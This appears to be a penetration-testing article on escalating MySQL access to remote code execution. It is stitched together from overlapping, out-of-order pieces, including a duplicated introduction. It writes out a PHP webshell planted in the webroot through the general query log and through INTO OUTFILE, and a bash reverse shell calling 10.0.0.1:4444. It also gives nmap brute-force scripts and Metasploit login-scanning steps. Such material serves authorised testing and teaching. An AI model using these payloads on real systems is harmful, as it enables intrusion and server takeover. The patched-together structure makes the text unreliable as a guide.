If secure_file_priv is NULL, INTO OUTFILE and LOAD_FILE() are disabled outright. The general query log is not covered by that setting, so an account that can change global variables (SUPER, or SYSTEM_VARIABLES_ADMIN on MySQL 8.0) can still write a file by pointing the log at it.
SHOW VARIABLES LIKE 'general_log%';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/mysqlshell.php';
SELECT "<?php system($_GET['cmd']); ?>";
-- Every statement, this one included, is appended verbatim to the log file; PHP runs the <?php ... ?> block and ignores the surrounding log text
HackTricks lists this as the fallback for the NULL case, but it does not bypass every file restriction: the SET GLOBAL calls need SUPER or SYSTEM_VARIABLES_ADMIN, log_output must include FILE, the OS account mysqld runs as must be allowed to create the file in the webroot (an AppArmor or SELinux profile for mysqld can deny that even when the directory permissions allow it), and the web server account must be able to read what mysqld wrote.
Beyond the Query: A Deep Dive into Verified MySQL Exploitation Techniques
Introduction
In the realm of penetration testing, MySQL is one of the most ubiquitous database management systems. While basic SQL injection focuses on extracting data, "verified" techniques, the kind popularized by resources like HackTricks and automated by tools like SQLMap, refer to a higher level of access: moving from data extraction to system control.
This article breaks down the "verified" MySQL attack chain, explaining how attackers (and auditors) check the server's configuration on the way to Remote Code Execution (RCE) and system compromise.
-- Write a PHP webshell (only if secure_file_priv permits and the file does not exist yet)
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
-- Write a reverse shell script; the file is owned by the mysqld OS user and is not executable, so something else has to run it
SELECT "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" INTO OUTFILE '/tmp/rev.sh';
Limitations: INTO OUTFILE will not overwrite an existing file; the output is created as the OS user running mysqld (that account needs write access to the directory, and the result is not executable); the FILE privilege is required; and when secure_file_priv names a directory, only paths under it are accepted.
Alternative for multi-line output (many rows into one file, one per line; the default separator is a comma and the default group_concat_max_len of 1024 silently truncates):
SET SESSION group_concat_max_len = 1000000;
SELECT GROUP_CONCAT(column SEPARATOR '\n') FROM table INTO OUTFILE '/tmp/output.txt' FIELDS ESCAPED BY '';
In the landscape of penetration testing and red team operations, MySQL remains one of the most ubiquitous relational database management systems. The HackTricks platform, maintained by Carlos Polop, has become a de facto reference for security professionals seeking verified, reproducible attack techniques. When a technique is labeled "HackTricks verified" for MySQL, it implies that the method has been tested, validated, and documented with practical command examples rather than theoretical speculation. This essay examines the core verified attack vectors against MySQL, their underlying vulnerabilities, and the essential defensive countermeasures.
Before exploiting, you must enumerate. Nmap is the standard bearer.
Verified Command:
nmap -sV -sC -p 3306 <target-ip> --script 'mysql*'
Quote the glob so the shell cannot expand it against files in the current directory. 'mysql*' also pulls in mysql-brute and mysql-empty-password, which actually attempt logins and will show up in the target's logs; --script mysql-info,mysql-empty-password is the quieter first pass.
What to look for: the server and protocol version reported by -sV and mysql-info (together with the authentication plugin and capability flags); any account that mysql-empty-password reports as having an empty password (it tries root and the anonymous account); and a "Host '...' is not allowed to connect to this MySQL server" message from mysql-info, which means the host filter, not the credentials, is blocking you. mysql-users, mysql-databases and mysql-variables only return data when given credentials through the mysqluser and mysqlpass script arguments.
Pro Tip: Use Metasploit's auxiliary scanners for speed. Both modules take RHOSTS; mysql_login additionally needs USERNAME/PASSWORD or USER_FILE/PASS_FILE, and STOP_ON_SUCCESS is worth setting so a found credential is not hammered further.
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login